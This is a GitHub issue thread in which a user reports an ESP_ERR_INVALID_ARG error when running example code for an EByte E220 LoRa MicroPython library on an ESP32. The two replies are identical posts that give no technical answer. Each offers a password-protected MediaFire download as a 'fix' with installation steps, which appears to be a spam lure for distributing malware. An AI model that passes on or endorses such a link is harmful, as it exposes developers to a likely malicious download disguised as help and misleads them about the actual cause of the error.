### ISSUE TITLE
E220-900T30D

### ISSUE THREAD

**Issue by cafalchio** [xreef/EByte_LoRa_E220_micropython_library#6]
Hi, I have tried example code on the e220 900T30D using the esp32 Expressif v4 kit.

```
from lora_e220 import LoRaE220
from machine import UART

uart2 = UART(2)
lora = LoRaE220('900T30D', uart2, aux_pin=15, m0_pin=21, m1_pin=19)

code = lora.begin()
print("Initialization: {}", ResponseStatusCode.get_description(code))
```
I am getting the following error: Any Idea how to solve?
**Traceback (most recent call last):
  File "<stdin>", line 7, in <module>
  File "/lib/lora_e220.py", line 350, in begin
OSError: (-258, 'ESP_ERR_INVALID_ARG')**

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
